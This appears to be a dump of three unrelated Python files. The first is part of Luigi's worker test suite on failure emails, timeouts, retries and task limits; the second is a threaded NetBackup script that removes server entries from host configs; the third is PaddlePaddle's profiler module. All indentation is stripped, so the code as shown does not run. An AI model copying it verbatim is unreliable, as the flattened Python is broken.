worker.run()
scheduler.prune()
self.assertEqual(3, len(emails))
self.assertTrue(any('a@test.com' in email for email in emails))
self.assertTrue(any('b@test.com' in email for email in emails))
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_run_error_batch_email_string(self, emails):
class A(luigi.Task):
owner_email = 'a@test.com'
def run(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
worker.add(A())
worker.run()
scheduler.prune()
self.assertEqual(2, len(emails))
self.assertTrue(any('a@test.com' in email for email in emails))
@with_config({'worker': {'send_failure_email': 'False'}})
@email_patch
def test_run_error_no_email(self, emails):
class A(luigi.Task):
def run(self):
raise Exception("b0rk")
luigi.build([A()], workers=1, local_scheduler=True)
self.assertFalse(emails)
@email_patch
def test_task_process_dies_with_email(self, emails):
a = SendSignalTask(signal.SIGKILL)
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(1, len(emails))
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
self.assertTrue(emails[0].find("died unexpectedly with exit code -9") != -1)
@with_config({'worker': {'send_failure_email': 'False'}})
@email_patch
def test_task_process_dies_no_email(self, emails):
luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)
self.assertEqual([], emails)
@email_patch
def test_task_times_out(self, emails):
class A(luigi.Task):
worker_timeout = 0.0001
def run(self):
time.sleep(5)
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(1, len(emails))
self.assertTrue(emails[0].find("Luigi: %s FAILED" % (a,)) != -1)
self.assertTrue(emails[0].find("timed out after 0.0001 seconds and was terminated.") != -1)
@with_config({'worker': {'send_failure_email': 'False'}})
@email_patch
def test_task_times_out_no_email(self, emails):
class A(luigi.Task):
worker_timeout = 0.0001
def run(self):
time.sleep(5)
luigi.build([A()], workers=2, local_scheduler=True)
self.assertEqual([], emails)
@with_config(dict(worker=dict(retry_external_tasks='true')))
@email_patch
def test_external_task_retries(self, emails):
"""
Test that we do not send error emails on the failures of external tasks
"""
class A(luigi.ExternalTask):
pass
a = A()
luigi.build([a], workers=2, local_scheduler=True)
self.assertEqual(emails, [])
@email_patch
def test_no_error(self, emails):
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertEqual(emails, [])
self.worker.run()
self.assertEqual(emails, [])
self.assertTrue(a.complete())
@custom_email_patch({"core": {"error-email": "not-a-real-email-address-for-test-only", 'email-type': 'none'}})
def test_disable_emails(self, emails):
class A(luigi.Task):
def complete(self):
raise Exception("b0rk")
self.worker.add(A())
self.assertEqual(emails, [])
class RaiseSystemExit(luigi.Task):
def run(self):
raise SystemExit("System exit!!")
class SendSignalTask(luigi.Task):
signal = luigi.IntParameter()
def run(self):
os.kill(os.getpid(), self.signal)
class HangTheWorkerTask(luigi.Task):
worker_timeout = luigi.IntParameter(default=None)
def run(self):
while True:
pass
def complete(self):
return False
class MultipleWorkersTest(unittest.TestCase):
@unittest.skip('Always skip. There are many intermittent failures')
# This pass under python3 when run as `nosetests test/worker_test.py`
# but not as `nosetests test`. Probably some side effect on previous tests
@unittest.skipIf(six.PY3, 'This test fail on python3 when run with tox.')
def test_multiple_workers(self):
# Test using multiple workers
# Also test generating classes dynamically since this may reflect issues with
# various platform and how multiprocessing is implemented. If it's using os.fork
# under the hood it should be fine, but dynamic classses can't be pickled, so
# other implementations of multiprocessing (using spawn etc) may fail
class MyDynamicTask(luigi.Task):
x = luigi.Parameter()
def run(self):
time.sleep(0.1)
t0 = time.time()
luigi.build([MyDynamicTask(i) for i in range(100)], workers=100, local_scheduler=True)
self.assertTrue(time.time() < t0 + 5.0) # should ideally take exactly 0.1s, but definitely less than 10.0
def test_zero_workers(self):
d = DummyTask()
luigi.build([d], workers=0, local_scheduler=True)
self.assertFalse(d.complete())
def test_system_exit(self):
# This would hang indefinitely before this fix:
# https://github.com/spotify/luigi/pull/439
luigi.build([RaiseSystemExit()], workers=2, local_scheduler=True)
def test_term_worker(self):
luigi.build([SendSignalTask(signal.SIGTERM)], workers=2, local_scheduler=True)
def test_kill_worker(self):
luigi.build([SendSignalTask(signal.SIGKILL)], workers=2, local_scheduler=True)
def test_purge_multiple_workers(self):
w = Worker(worker_processes=2, wait_interval=0.01)
t1 = SendSignalTask(signal.SIGTERM)
t2 = SendSignalTask(signal.SIGKILL)
w.add(t1)
w.add(t2)
w._run_task(t1.task_id)
w._run_task(t2.task_id)
time.sleep(1.0)
w._handle_next_task()
w._handle_next_task()
w._handle_next_task()
def test_stop_worker_kills_subprocesses(self):
with Worker(worker_processes=2) as w:
hung_task = HangTheWorkerTask()
w.add(hung_task)
w._run_task(hung_task.task_id)
pids = [p.pid for p in w._running_tasks.values()]
self.assertEqual(1, len(pids))
pid = pids[0]
def is_running():
return pid in {p.pid for p in psutil.Process().children()}
self.assertTrue(is_running())
self.assertFalse(is_running())
def test_time_out_hung_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=2, local_scheduler=True)
def test_time_out_hung_single_worker(self):
luigi.build([HangTheWorkerTask(0.1)], workers=1, local_scheduler=True)
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/72953986')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_default_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask()
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 5
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 6
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
@skipOnTravis('https://travis-ci.org/spotify/luigi/jobs/76645264')
@mock.patch('luigi.worker.time')
def test_purge_hung_worker_override_timeout_time(self, mock_time):
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=10)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 10
w._handle_next_task()
self.assertEqual(1, len(w._running_tasks))
mock_time.time.return_value = 11
w._handle_next_task()
self.assertEqual(0, len(w._running_tasks))
class Dummy2Task(Task):
p = luigi.Parameter()
def output(self):
return MockTarget(self.p)
def run(self):
f = self.output().open('w')
f.write('test')
f.close()
class AssistantTest(unittest.TestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.assistant = Worker(scheduler=self.sch, worker_id='Y', assistant=True)
with Worker(scheduler=self.sch, worker_id='X') as w:
self.w = w
super(AssistantTest, self).run(result)
def test_get_work(self):
d = Dummy2Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assistant.run()
self.assertTrue(d.complete())
def test_bad_job_type(self):
class Dummy3Task(Dummy2Task):
task_family = 'UnknownTaskFamily'
d = Dummy3Task('123')
self.w.add(d)
self.assertFalse(d.complete())
self.assertFalse(self.assistant.run())
self.assertFalse(d.complete())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [d.task_id])
def test_unimported_job_type(self):
MODULE_CONTENTS = b'''
import luigi
class UnimportedTask(luigi.Task):
def complete(self):
return False
'''
reg = luigi.task_register.Register._get_reg()
class UnimportedTask(luigi.Task):
task_module = None # Set it here, so it's generally settable
luigi.task_register.Register._set_reg(reg)
task = UnimportedTask()
# verify that it can't run the task without the module info necessary to import it
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
# check that it can import with the right module
with temporary_unloaded_module(MODULE_CONTENTS) as task.task_module:
self.w.add(task)
self.assertTrue(self.assistant.run())
self.assertEqual(list(self.sch.task_list('DONE', '').keys()), [task.task_id])
def test_unimported_job_sends_failure_message(self):
class NotInAssistantTask(luigi.Task):
task_family = 'Unknown'
task_module = None
task = NotInAssistantTask()
self.w.add(task)
self.assertFalse(self.assistant.run())
self.assertEqual(list(self.sch.task_list('FAILED', '').keys()), [task.task_id])
self.assertTrue(self.sch.fetch_error(task.task_id)['error'])
class ForkBombTask(luigi.Task):
depth = luigi.IntParameter()
breadth = luigi.IntParameter()
p = luigi.Parameter(default=(0, )) # ehm for some weird reason [0] becomes a tuple...?
def output(self):
return MockTarget('.'.join(map(str, self.p)))
def run(self):
with self.output().open('w') as f:
f.write('Done!')
def requires(self):
if len(self.p) < self.depth:
for i in range(self.breadth):
yield ForkBombTask(self.depth, self.breadth, self.p + (i, ))
class TaskLimitTest(unittest.TestCase):
def tearDown(self):
MockFileSystem().remove('')
@with_config({'core': {'worker-task-limit': '6'}})
def test_task_limit_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertFalse(t.complete())
leaf_tasks = [ForkBombTask(3, 2, branch) for branch in [(0, 0, 0), (0, 0, 1), (0, 1, 0), (0, 1, 1)]]
self.assertEqual(3, sum(t.complete() for t in leaf_tasks),
"should have gracefully completed as much as possible even though the single last leaf didn't get scheduled")
@with_config({'core': {'worker-task-limit': '7'}})
def test_task_limit_not_exceeded(self):
w = Worker()
t = ForkBombTask(3, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
def test_no_task_limit(self):
w = Worker()
t = ForkBombTask(4, 2)
w.add(t)
w.run()
self.assertTrue(t.complete())
class WorkerConfigurationTest(unittest.TestCase):
def test_asserts_for_worker(self):
"""
Test that Worker() asserts that it's sanely configured
"""
Worker(wait_interval=1) # This shouldn't raise
self.assertRaises(AssertionError, Worker, wait_interval=0)
class WorkerWaitJitterTest(unittest.TestCase):
@with_config({'worker': {'wait_jitter': '10.0'}})
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter(self, mock_sleep, mock_random):
""" verify configured jitter amount """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 2.0
six.next(x)
mock_random.assert_called_with(0, 10.0)
mock_sleep.assert_called_with(3.0)
@mock.patch("random.uniform")
@mock.patch("time.sleep")
def test_wait_jitter_default(self, mock_sleep, mock_random):
""" verify default jitter is as expected """
mock_random.return_value = 1.0
w = Worker()
x = w._sleeper()
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(2.0)
mock_random.return_value = 3.3
six.next(x)
mock_random.assert_called_with(0, 5.0)
mock_sleep.assert_called_with(4.3)
class KeyboardInterruptBehaviorTest(LuigiTestCase):
def test_propagation_when_executing(self):
"""
Ensure that keyboard interrupts causes luigi to quit when you are
executing tasks.
TODO: Add a test that tests the multiprocessing (--worker >1) case
"""
class KeyboardInterruptTask(luigi.Task):
def run(self):
raise KeyboardInterrupt()
cmd = 'KeyboardInterruptTask --local-scheduler --no-lock'.split(' ')
self.assertRaises(KeyboardInterrupt, luigi_run, cmd)
def test_propagation_when_scheduling(self):
"""
Test that KeyboardInterrupt causes luigi to quit while scheduling.
"""
class KeyboardInterruptTask(luigi.Task):
def complete(self):
raise KeyboardInterrupt()
class ExternalKeyboardInterruptTask(luigi.ExternalTask):
def complete(self):
raise KeyboardInterrupt()
self.assertRaises(KeyboardInterrupt, luigi_run,
['KeyboardInterruptTask', '--local-scheduler', '--no-lock'])
self.assertRaises(KeyboardInterrupt, luigi_run,
['ExternalKeyboardInterruptTask', '--local-scheduler', '--no-lock'])
class WorkerPurgeEventHandlerTest(unittest.TestCase):
@mock.patch('luigi.worker.TaskProcess')
def test_process_killed_handler(self, task_proc):
result = []
@HangTheWorkerTask.event_handler(Event.PROCESS_FAILURE)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker()
task = HangTheWorkerTask()
task_process = mock.MagicMock(is_alive=lambda: False, exitcode=-14, task=task)
task_proc.return_value = task_process
w.add(task)
w._run_task(task.task_id)
w._handle_next_task()
self.assertEqual(result, [task])
@mock.patch('luigi.worker.time')
def test_timeout_handler(self, mock_time):
result = []
@HangTheWorkerTask.event_handler(Event.TIMEOUT)
def store_task(t, error_msg):
self.assertTrue(error_msg)
result.append(t)
w = Worker(worker_processes=2, wait_interval=0.01, timeout=5)
mock_time.time.return_value = 0
task = HangTheWorkerTask(worker_timeout=1)
w.add(task)
w._run_task(task.task_id)
mock_time.time.return_value = 3
w._handle_next_task()
self.assertEqual(result, [task])
class PerTaskRetryPolicyBehaviorTest(LuigiTestCase):
def setUp(self):
super(PerTaskRetryPolicyBehaviorTest, self).setUp()
self.per_task_retry_count = 2
self.default_retry_count = 1
self.sch = Scheduler(retry_delay=0.1, retry_count=self.default_retry_count, prune_on_get_work=True)
def test_with_all_disabled_with_single_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires two another tasks (TestErrorTask1,TestErrorTask1) which both is failed, is
tested.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on single worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_all_disabled_with_multiple_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires two another tasks (TestErrorTask1,TestErrorTask1) which both is failed, is
tested.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on multiple worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e2, e1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e2))
self.assertTrue(w3.add(e1))
self.assertFalse(w3.run())
self.assertFalse(w2.run())
self.assertTrue(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_includes_success_with_single_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires one (TestErrorTask1) FAILED and one (TestSuccessTask1) SUCCESS, is tested.
Task TestSuccessTask1 will be DONE successfully, but Task TestErrorTask1 will be failed and it has retry_count at task level as 2.
This test is running on single worker
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_includes_success_with_multiple_worker(self):
"""
With this test, a case which has a task (TestWrapperTask), requires one (TestErrorTask1) FAILED and one (TestSuccessTask1) SUCCESS, is tested.
Task TestSuccessTask1 will be DONE successfully, but Task TestErrorTask1 will be failed and it has retry_count at task level as 2.
This test is running on multiple worker
"""
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestErrorTask1(DummyErrorTask):
retry_count = self.per_task_retry_count
e1 = TestErrorTask1()
class TestWrapperTask(luigi.WrapperTask):
def requires(self):
return [e1, s1]
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
with Worker(scheduler=self.sch, worker_id='Z', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w3:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(e1))
self.assertTrue(w3.add(s1))
self.assertTrue(w3.run())
self.assertFalse(w2.run())
self.assertTrue(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual([e1.task_id], list(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual([s1.task_id], list(self.sch.task_list('DONE', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_single_worker(self):
"""
With this test, a case includes dependency tasks(TestErrorTask1,TestErrorTask2) which both are failed.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on single worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
self.assertTrue(w1.add(wt))
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
def test_with_dynamic_dependencies_with_multiple_workers(self):
"""
With this test, a case includes dependency tasks(TestErrorTask1,TestErrorTask2) which both are failed.
Task TestErrorTask1 has default retry_count which is 1, but Task TestErrorTask2 has retry_count at task level as 2.
This test is running on multiple worker
"""
class TestErrorTask1(DummyErrorTask):
pass
e1 = TestErrorTask1()
class TestErrorTask2(DummyErrorTask):
retry_count = self.per_task_retry_count
e2 = TestErrorTask2()
class TestSuccessTask1(DummyTask):
pass
s1 = TestSuccessTask1()
class TestWrapperTask(DummyTask):
def requires(self):
return [s1]
def run(self):
super(TestWrapperTask, self).run()
yield e2, e1
wt = TestWrapperTask()
with Worker(scheduler=self.sch, worker_id='X', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w1:
with Worker(scheduler=self.sch, worker_id='Y', keep_alive=True, wait_interval=0.1, wait_jitter=0.05) as w2:
self.assertTrue(w1.add(wt))
self.assertTrue(w2.add(s1))
self.assertTrue(w2.run())
self.assertFalse(w1.run())
self.assertEqual([wt.task_id], list(self.sch.task_list('PENDING', 'UPSTREAM_DISABLED').keys()))
self.assertEqual(sorted([e1.task_id, e2.task_id]), sorted(self.sch.task_list('DISABLED', '').keys()))
self.assertEqual(0, self.sch._state.get_task(wt.task_id).failures.num_failures())
self.assertEqual(0, self.sch._state.get_task(s1.task_id).failures.num_failures())
self.assertEqual(self.per_task_retry_count, self.sch._state.get_task(e2.task_id).failures.num_failures())
self.assertEqual(self.default_retry_count, self.sch._state.get_task(e1.task_id).failures.num_failures())
|
del_server_nbu.py
|
import logging
import os
import os.path
import platform
import subprocess
import threading
from math import ceil
from optparse import OptionParser
from sys import exit, stdout
is_win = True if platform.system() == 'Windows' else False
bin_admin_path = r'C:\Program Files\Veritas\NetBackup\bin\admincmd' if is_win else r'/usr/openv/netbackup/bin/admincmd'
BPGETCONFIG = r'bpgetconfig.exe' if is_win else r'bpgetconfig'
BPSETCONFIG = r'bpsetconfig.exe' if is_win else r'bpsetconfig'
FORMAT = 'thread %(thread)d: %(message)s '
usage = "usage: %prog [options] host1 host2 host3 ..."
parser = OptionParser(usage)
parser.add_option("-f", "--file", dest="host_list_file",
help="read hosts from file, one per line;")
parser.add_option("-s", "--server", dest="server_file", default=None,
help="read new server entries from file, bp.conf syntax SERVER = HOSTNAME")
parser.add_option("-b", "--bin_admin",
dest="bin_admin", default=bin_admin_path,
help="path to .../netbackup/bin/admincmd")
parser.add_option("-n", "--num_threads",
dest="num_threads", default=100,
help="number of threads to run simultaneously")
parser.add_option("-v", "--verbose",
action="store_true", dest="verbose", default=False,
help="print status messages to stdout")
parser.add_option("-d", "--debug",
action="store_true", dest="debug", default=False,
help="print debug messages to stdout")
(options, args) = parser.parse_args()
hosts = args
servers = []
bpgetconfig_path = os.path.join(os.path.join(options.bin_admin, BPGETCONFIG))
bpsetconfig_path = os.path.join(os.path.join(options.bin_admin, BPSETCONFIG))
if options.debug:
logging.basicConfig(stream=stdout, format=FORMAT, level=logging.DEBUG)
else:
if options.verbose:
logging.basicConfig(stream=stdout, format=FORMAT, level=logging.INFO)
else:
logging.basicConfig(stream=stdout, format=FORMAT, level=logging.WARN)
if options.host_list_file:
if os.path.isfile(options.host_list_file):
with open(options.host_list_file) as f:
hosts = hosts + f.read().splitlines()
if os.path.isfile(options.server_file):
with open(options.server_file) as f:
servers = f.read().splitlines()
servers = filter(None, servers)
for entry in servers:
if entry[:9] != 'SERVER = ':
logging.critical("Entry >>{0}<< doesn't have >>SERVER = << in it".format(entry))
exit(1)
else:
logging.critical("Can't find server file {0}".format(options.server_file))
exit(1)
if len(hosts) == 0:
logging.critical('No hosts were provided for a check')
exit(1)
if not os.path.isfile(bpgetconfig_path):
logging.critical("Can't find bpgetconfig in {0}".format(options.bin_admin))
exit(1)
if not os.path.isfile(bpsetconfig_path):
logging.critical("Can't find bpsetconfig in {0}".format(options.bin_admin))
exit(1)
def split(arr, size):
arrs = []
while len(arr) > size:
pice = arr[:size]
arrs.append(pice)
arr = arr[size:]
arrs.append(arr)
return arrs
def del_nbu_server(host):
out = ''
with open(os.devnull, 'w') as FNULL:
try:
logging.info("Getting config from host {0}".format(host))
out = subprocess.Popen([bpgetconfig_path, "-M", host],
stdout=subprocess.PIPE, stderr=FNULL).communicate()[0].strip()
except subprocess.CalledProcessError:
logging.warn("Can't reach host {0}".format(host))
if len(out) != 0:
logging.debug("Config for host {0} was >>{2}{1}{2}<<".format(host, out, os.linesep))
host_servers = filter(lambda x: x not in servers, out.splitlines())
host_servers = [ii for n, ii in enumerate(host_servers) if ii not in host_servers[:n]] # remove duplicates
host_servers = os.linesep.join(host_servers)
logging.debug("Setting servers to >>{0}<< for host {1}".format(host, host_servers))
subprocess.Popen([bpsetconfig_path, '-h', host], stdin=subprocess.PIPE, stdout=FNULL,
stderr=FNULL).communicate(
input=host_servers)
logging.info("Config for host {0} was updated".format(host))
try:
logging.info("Verifying that host {0} reachable after update".format(host))
out = subprocess.Popen([bpgetconfig_path, "-M", host],
stdout=subprocess.PIPE, stderr=FNULL).communicate()[0].strip()
if len(out) == 0:
logging.critical("After updating config on host {0} became unreachable. Aborting...".format(host))
os._exit(1) # stop all threads
else:
logging.info("Host {0} is reachable after update. OK.".format(host))
print '{0} config was updated successfully'.format(host)
except subprocess.CalledProcessError:
logging.critical("After updating config on host {0} became unreachable. Aborting...".format(host))
os._exit(1) # stop all threads
else:
logging.warn("Can't reach host {0}".format(host))
def del_server_hosts(task_list):
for host in task_list:
del_nbu_server(host)
threads = []
if __name__ == '__main__':
part_hosts = split(hosts, int(ceil(float(len(hosts)) / options.num_threads)))
for task_list in part_hosts:
t = threading.Thread(target=del_server_hosts, args=(task_list,))
threads.append(t)
t.start()
for t in threads:
t.join()
|
profiler.py
|
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# pylint: disable=doc-string-missing
import os
import sys
import logging
if sys.version_info.major == 2:
import Queue
elif sys.version_info.major == 3:
import queue as Queue
else:
raise Exception("Error Python version")
from time import time as _time
import time
import threading
import multiprocessing
_LOGGER = logging.getLogger(__name__)
_LOGGER.propagate = False
class PerformanceTracer(object):
def __init__(self, is_thread_mode, interval_s, server_worker_num):
self._is_thread_mode = is_thread_mode
if is_thread_mode:
# Because the Channel in the thread mode cannot be
# accessed across processes, when using thread mode,
# the PerformanceTracer is also the thread mode.
# However, performance may be affected by GIL.
self._data_buffer = Queue.Queue()
else:
self._data_buffer = multiprocessing.Manager().Queue()
self._interval_s = interval_s
self._thrd = None
self._proc = None
self._channels = []
# The size of data in Channel will not exceed server_worker_num
self._server_worker_num = server_worker_num
def data_buffer(self):
return self._data_buffer
def start(self):
if self._is_thread_mode:
self._thrd = threading.Thread(
target=self._trace_func, args=(self._channels, ))
self._thrd.daemon = True
self._thrd.start()
else:
self._proc = multiprocessing.Process(
target=self._trace_func, args=(self._channels, ))
self._proc.daemon = True
self._proc.start()
def set_channels(self, channels):
self._channels = channels
def _trace_func(self, channels):
all_actions = ["in", "prep", "midp", "postp", "out"]
calcu_actions = ["prep", "midp", "postp"]
while True:
op_cost = {}
err_request = []
err_count = 0
_LOGGER.info("==================== TRACER ======================")
# op
while True:
try:
item = self._data_buffer.get_nowait()
name = item["name"]
actions = item["actions"]
if name == "DAG":
succ = item["succ"]
req_id = item["id"]
if not succ:
err_count += 1
err_request.append(req_id)
if name not in op_cost:
op_cost[name] = {}
for action, cost in actions.items():
if action not in op_cost[name]:
op_cost[name][action] = []
op_cost[name][action].append(cost)
except Queue.Empty:
break
if len(op_cost) != 0:
for name in op_cost:
tot_cost, calcu_cost = 0.0, 0.0
for action, costs in op_cost[name].items():
op_cost[name][action] = sum(costs) / (1e3 * len(costs))
tot_cost += op_cost[name][action]
if name != "DAG":
_LOGGER.info("Op({}):".format(name))
for action in all_actions:
if action in op_cost[name]:
_LOGGER.info("\t{}[{} ms]".format(
action, op_cost[name][action]))
for action in calcu_actions:
if action in op_cost[name]:
calcu_cost += op_cost[name][action]
_LOGGER.info("\tidle[{}]".format(1 - 1.0 * calcu_cost /
tot_cost))
if "DAG" in op_cost:
calls = list(op_cost["DAG"].values())
calls.sort()
tot = len(calls)
qps = 1.0 * tot / self._interval_s
ave_cost = sum(calls) / tot
latencys = [50, 60, 70, 80, 90, 95, 99]
_LOGGER.info("DAGExecutor:")
_LOGGER.info("\tQuery count[{}]".format(tot))
_LOGGER.info("\tQPS[{} q/s]".format(qps))
_LOGGER.info("\tSucc[{}]".format(1 - 1.0 * err_count / tot))
_LOGGER.info("\tError req[{}]".format(", ".join(
[str(x) for x in err_request])))
_LOGGER.info("\tLatency:")
_LOGGER.info("\t\tave[{} ms]".format(ave_cost))
for latency in latencys:
_LOGGER.info("\t\t.{}[{} ms]".format(latency, calls[int(
tot * latency / 100.0)]))
# channel
_LOGGER.info("Channel (server worker num[{}]):".format(
self._server_worker_num))
for channel in channels:
_LOGGER.info("\t{}(In: {}, Out: {}) size[{}/{}]".format(
channel.name,
channel.get_producers(),
channel.get_consumers(),
channel.size(), channel.get_maxsize()))
time.sleep(self._interval_s)
class UnsafeTimeProfiler(object):
""" thread unsafe profiler """
def __init__(self):
self.pid = os.getpid()
self.print_head = 'PROFILE\tpid:{}\t'.format(self.pid)
self.time_record = [self.print_head]
self._enable = False
def enable(self, enable):
self._enable = enable
def record(self, name):
if self._enable is False:
return
timestamp = int(round(_time() * 1000000))
self.time_record.append('{}:{} '.format(name, timestamp))
return timestamp
def print_profile(self):
if self._enable is False:
return
sys.stderr.write(self.gen_profile_str())
def gen_profile_str(self):
if self._enable is False:
return
self.time_record.append('\n')
profile_str = ''.join(self.time_record)
self.time_record = [self.print_head]
return profile_str
class TimeProfiler(object):
def __init__(self):
self._pid = os.getpid()
self._print_head = 'PROFILE\tpid:{}\t'.format(self._pid)
self._time_record = Queue.Queue()
self._enable = False
